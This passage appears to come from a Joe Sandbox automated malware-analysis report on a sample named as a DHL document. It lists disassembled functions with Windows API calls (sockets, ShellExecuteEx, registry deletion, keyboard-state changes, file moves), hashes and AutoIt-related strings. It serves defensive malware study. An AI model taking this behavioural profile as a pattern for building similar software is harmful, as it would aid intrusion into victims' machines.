                                                                                  • Instruction Fuzzy Hash: F4C119715087419FC724EF28D895A6AB7E4FF85310F044A2EF899973A2DB70ED45CB82
                                                                                  APIs
                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00946F14
                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00946F35
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00946F48
                                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 00946FFE
                                                                                  • inet_ntoa.WSOCK32(?), ref: 00946FBB
                                                                                    • Part of subcall function 0092AE14: _strlen.LIBCMT ref: 0092AE1E
                                                                                    • Part of subcall function 0092AE14: _memmove.LIBCMT ref: 0092AE40
                                                                                  • _strlen.LIBCMT ref: 00947058
                                                                                  • _memmove.LIBCMT ref: 009470C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                  • String ID:
                                                                                  • API String ID: 3619996494-0
                                                                                  • Opcode ID: a8af822057a96bc351e177cb3ecc2b0f9b860e05f9ccf06aab21c731f2e3a434
                                                                                  • Instruction ID: 10416b602624d8a5d5865876443649ea28808228e793232903e255fb01639db9
                                                                                  • Opcode Fuzzy Hash: a8af822057a96bc351e177cb3ecc2b0f9b860e05f9ccf06aab21c731f2e3a434
                                                                                  • Instruction Fuzzy Hash: 7681EF71108300ABD710EF68CC86F6BB7E9EF84724F104A1EF5559B2A2DB70AD04CB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4edece54643b447409d759252d084299f045aaf93a3d3871bc5f0ec5777784a2
                                                                                  • Instruction ID: 7f65a58d7afb5a1199f4821ff10a9da9b5bf65a9bd9b1cb3f0b631541a94154e
                                                                                  • Opcode Fuzzy Hash: 4edece54643b447409d759252d084299f045aaf93a3d3871bc5f0ec5777784a2
                                                                                  • Instruction Fuzzy Hash: 8C714B30904109FFCF049F99C849AAEBB7AFF85324F14825AF915AB351C734AA51CBA5
                                                                                  APIs
                                                                                  • IsWindow.USER32(00E257D0), ref: 0095B6A5
                                                                                  • IsWindowEnabled.USER32(00E257D0), ref: 0095B6B1
                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0095B795
                                                                                  • SendMessageW.USER32(00E257D0,000000B0,?,?), ref: 0095B7CC
                                                                                  • IsDlgButtonChecked.USER32(?,?), ref: 0095B809
                                                                                  • GetWindowLongW.USER32(00E257D0,000000EC), ref: 0095B82B
                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0095B843
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                  • String ID:
                                                                                  • API String ID: 4072528602-0
                                                                                  • Opcode ID: 9eb5b22bf60adc1dde7e4cf520f5e624d579775c2a3b2b3ac42338cdef4d383b
                                                                                  • Instruction ID: a895e0ecbd20efbff94687cbeadc8793a3cb76a97fc905b58d5939a80186fff2
                                                                                  • Opcode Fuzzy Hash: 9eb5b22bf60adc1dde7e4cf520f5e624d579775c2a3b2b3ac42338cdef4d383b
                                                                                  • Instruction Fuzzy Hash: 6371BB34605304AFDB20DF66C8A4FAABBF9FF89352F144469FD45972A1C731A848DB10
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0094F75C
                                                                                  • _memset.LIBCMT ref: 0094F825
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0094F86A
                                                                                    • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                                                    • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                                                                    • Part of subcall function 008EFEC6: _wcscpy.LIBCMT ref: 008EFEE9
                                                                                  • GetProcessId.KERNEL32(00000000), ref: 0094F8E1
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0094F910
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                  • String ID: @
                                                                                  • API String ID: 3522835683-2766056989
                                                                                  • Opcode ID: cf3e9b7bfafefe82cea32907ddb4275fbc6fc2c4c3bb73f5b9bee933d7664a57
                                                                                  • Instruction ID: 6982b11894ba824591fb8afd2f7c124e0d3ae5bb7413b4152e691fbbfd620450
                                                                                  • Opcode Fuzzy Hash: cf3e9b7bfafefe82cea32907ddb4275fbc6fc2c4c3bb73f5b9bee933d7664a57
                                                                                  • Instruction Fuzzy Hash: A5619075A0061AEFCF14EF68C5909AEBBF5FF48310F14856AE846AB351CB30AD40CB91
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 0093149C
                                                                                  • GetKeyboardState.USER32(?), ref: 009314B1
                                                                                  • SetKeyboardState.USER32(?), ref: 00931512
                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00931540
                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 0093155F
                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 009315A5
                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009315C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  • Opcode ID: 23b48c09f54163f09856e001563f97d46c5c50db436fa55751cf87779215bc82
                                                                                  • Instruction ID: 17903c1724b1cd883894ce21c6e6f4e39c7850791889ac3fd752bdf1f4cd52ad
                                                                                  • Opcode Fuzzy Hash: 23b48c09f54163f09856e001563f97d46c5c50db436fa55751cf87779215bc82
                                                                                  • Instruction Fuzzy Hash: F35103A0A087D53EFB3643748C09BBA7EAD5B46304F0C8489F1D6468E2C3D8EC94DB51
                                                                                  APIs
                                                                                  • GetParent.USER32(00000000), ref: 009312B5
                                                                                  • GetKeyboardState.USER32(?), ref: 009312CA
                                                                                  • SetKeyboardState.USER32(?), ref: 0093132B
                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00931357
                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00931374
                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009313B8
                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009313D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  • Opcode ID: 8294b3b03e5f88d6d5bf0be25a61a9e2af2129ecd1b97cae8d4f1c2c95185048
                                                                                  • Instruction ID: 97c37354f7b2fe3f0c6b5ca71ff02ca6b7a20d283c4a8544834e0b9f45d35e94
                                                                                  • Opcode Fuzzy Hash: 8294b3b03e5f88d6d5bf0be25a61a9e2af2129ecd1b97cae8d4f1c2c95185048
                                                                                  • Instruction Fuzzy Hash: 9D51F5A05087D53DFB3287248C55BBABFAD5F06300F0C8589F1D5468E2D795EC94EB61
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                  • String ID:
                                                                                  • API String ID: 2945705084-0
                                                                                  • Opcode ID: b190f9e7f9a7708977f82bb4b04916e78474c58573a86ed4733d36c0963ff015
                                                                                  • Instruction ID: 8241e98bedef40682154c11ad196435e1623e8c407e4804011aaa20d1a3f171f
                                                                                  • Opcode Fuzzy Hash: b190f9e7f9a7708977f82bb4b04916e78474c58573a86ed4733d36c0963ff015
                                                                                  • Instruction Fuzzy Hash: 15418365C2161876CB10FBB888869DFB7A8EF04310F519566F618E3122E634E715CBA6
                                                                                  APIs
                                                                                    • Part of subcall function 009348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009338D3,?), ref: 009348C7
                                                                                    • Part of subcall function 009348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009338D3,?), ref: 009348E0
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 009338F3
                                                                                  • _wcscmp.LIBCMT ref: 0093390F
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00933927
                                                                                  • _wcscat.LIBCMT ref: 0093396F
                                                                                  • SHFileOperationW.SHELL32(?), ref: 009339DB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 1377345388-1173974218
                                                                                  • Opcode ID: 5fb10019f93aa9a50141444eca8613c03d1f4a9ec2d895e662a4c4d213a6737c
                                                                                  • Instruction ID: 10a3f23d99c0559db7f9636ca66e57d8c52e8d406d54e04bab9bef19dee7f278
                                                                                  • Opcode Fuzzy Hash: 5fb10019f93aa9a50141444eca8613c03d1f4a9ec2d895e662a4c4d213a6737c
                                                                                  • Instruction Fuzzy Hash: BA416DB254C384DAC751EF64C881AEBB7ECEF89350F14592EB48AC3151EA74D688CB52
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00957519
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009575C0
                                                                                  • IsMenu.USER32(?), ref: 009575D8
                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00957620
                                                                                  • DrawMenuBar.USER32 ref: 00957633
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 3866635326-4108050209
                                                                                  • Opcode ID: 5f322e1bfb6895010d2ec10f1a61a5f7ee4ae8a6f8391db3b511d457e35576c0
                                                                                  • Instruction ID: bc1c881ff8fee560561bc115891e9b3b6fedb4c055212a8e623b9060725fed09
                                                                                  • Opcode Fuzzy Hash: 5f322e1bfb6895010d2ec10f1a61a5f7ee4ae8a6f8391db3b511d457e35576c0
                                                                                  • Instruction Fuzzy Hash: 4A416A74A05608EFDB10DF9AE884EAABBF8FB04361F048029FD1597250D730AE45DFA1
                                                                                  APIs
                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0095125C
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00951286
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 0095133D
                                                                                    • Part of subcall function 0095122D: RegCloseKey.ADVAPI32(?), ref: 009512A3
                                                                                    • Part of subcall function 0095122D: FreeLibrary.KERNEL32(?), ref: 009512F5
                                                                                    • Part of subcall function 0095122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00951318
                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 009512E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                  • String ID:
                                                                                  • API String ID: 395352322-0
                                                                                  • Opcode ID: f3f3fb08c2ba271bacfd41f232113529392d98d83ff3f91436a1c0169e1598f6
                                                                                  • Instruction ID: 04a00da72d790442b2590a581b2c22e2c59c3c05acb3b31fd4994a5f7f5c90f0
                                                                                  • Opcode Fuzzy Hash: f3f3fb08c2ba271bacfd41f232113529392d98d83ff3f91436a1c0169e1598f6
                                                                                  • Instruction Fuzzy Hash: BB315E71911209BFDB14DBA1DC99EFFB7BCEF08311F000169E911E2151DB749E499BA0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0095655B
                                                                                  • GetWindowLongW.USER32(00E257D0,000000F0), ref: 0095658E
                                                                                  • GetWindowLongW.USER32(00E257D0,000000F0), ref: 009565C3
                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009565F5
                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0095661F
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00956630
                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0095664A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongWindow$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 2178440468-0
                                                                                  • Opcode ID: aeff89f29008a2a1c9cfab0fc9f4ded3b696a1a40ffd9d45524bdc7f3c2b870b
                                                                                  • Instruction ID: bc99fd222ded3c58595779b4d08b54c161685ece3f06a962dfa5f78d2f03eee6
                                                                                  • Opcode Fuzzy Hash: aeff89f29008a2a1c9cfab0fc9f4ded3b696a1a40ffd9d45524bdc7f3c2b870b
                                                                                  • Instruction Fuzzy Hash: DD315730659214AFDB20CF1ADC88F553BE5FB4A362F9801A8F9018B2B5DB31EC45EB41
                                                                                  APIs
                                                                                    • Part of subcall function 009480A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009480CB
                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009464D9
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009464E8
                                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00946521
                                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 0094652A
                                                                                  • WSAGetLastError.WSOCK32 ref: 00946534
                                                                                  • closesocket.WSOCK32(00000000), ref: 0094655D
                                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00946576
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                  • String ID:
                                                                                  • API String ID: 910771015-0
                                                                                  • Opcode ID: ed365bba1650f3a59dd75c43f8dcdb50a0417777c91ac5e91f5ccdc59b0099d1
                                                                                  • Instruction ID: 590e1f927b2442d1e415a6699ced31718cfa2af096c810601d47c4a6d8db216d
                                                                                  • Opcode Fuzzy Hash: ed365bba1650f3a59dd75c43f8dcdb50a0417777c91ac5e91f5ccdc59b0099d1
                                                                                  • Instruction Fuzzy Hash: D931A171610218ABDF10AF24CC95FBE7BBCEB45721F004029F94AD7291DB74AD04DB62
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0092E0FA
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0092E120
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0092E123
                                                                                  • SysAllocString.OLEAUT32 ref: 0092E144
                                                                                  • SysFreeString.OLEAUT32 ref: 0092E14D
                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 0092E167
                                                                                  • SysAllocString.OLEAUT32(?), ref: 0092E175
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                  • String ID:
                                                                                  • API String ID: 3761583154-0
                                                                                  • Opcode ID: 0c5930a66adca3b37d6de0f59f854cdbc94b8c4e72002e58352643009fe9dcf1
                                                                                  • Instruction ID: f823bfc70b503edf149603e4a263878b556f95ab1667cf1e3d4ae59427865b53
                                                                                  • Opcode Fuzzy Hash: 0c5930a66adca3b37d6de0f59f854cdbc94b8c4e72002e58352643009fe9dcf1
                                                                                  • Instruction Fuzzy Hash: 46217435608218AFDB10AFA9DCC8CAB77ECEB09760B108135F915CB2A5DB74DC419B64
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp
                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                  • API String ID: 1038674560-2734436370
                                                                                  • Opcode ID: f7829adc1069fe594894332ea45e68640f24a0b44b922347a68e0b8736d99491
                                                                                  • Instruction ID: e2a227eeae932f17c81e9921cea8191e72c2cdcce8935dd624cba0cdc3a8e32b
                                                                                  • Opcode Fuzzy Hash: f7829adc1069fe594894332ea45e68640f24a0b44b922347a68e0b8736d99491
                                                                                  • Instruction Fuzzy Hash: 03214572100A75A6D230E738ED22EB773ACEF51300F104436F98AC7189EB50AD818792
                                                                                  APIs
                                                                                    • Part of subcall function 008D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008D1D73
                                                                                    • Part of subcall function 008D1D35: GetStockObject.GDI32(00000011), ref: 008D1D87
                                                                                    • Part of subcall function 008D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008D1D91
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009578A1
                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009578AE
                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009578B9
                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009578C8
                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009578D4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                  • String ID: Msctls_Progress32
                                                                                  • API String ID: 1025951953-3636473452
